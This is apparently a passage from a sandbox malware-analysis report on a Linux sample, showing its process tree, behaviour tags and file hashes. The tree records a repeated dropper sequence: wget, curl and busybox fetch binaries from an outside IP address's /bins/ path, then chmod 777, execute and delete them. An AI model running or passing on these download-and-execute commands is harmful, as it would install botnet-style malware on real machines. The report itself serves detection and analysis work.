- File and Directory Permissions Modification
PID:918
-
-
/tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj./1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:923
-
-
/bin/chmodchmod 777 qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1./qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:926
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:927
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:929
-
-
/bin/chmodchmod 777 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA./XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:932
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:933
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:935
-
-
/bin/chmodchmod 777 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy./eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:938
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:939
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:941
-
-
/bin/chmodchmod 777 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS./ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:944
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:945
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:947
-
-
/bin/chmodchmod 777 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS./ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:950
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:951
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:953
-
-
/bin/chmodchmod 777 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR./hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:956
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:957
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:959
-
-
/bin/chmodchmod 777 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV./PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:962
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:963
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:965
-
-
/bin/chmodchmod 777 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ./qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:968
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:969
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:971
-
-
/bin/chmodchmod 777 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2./laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:974
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97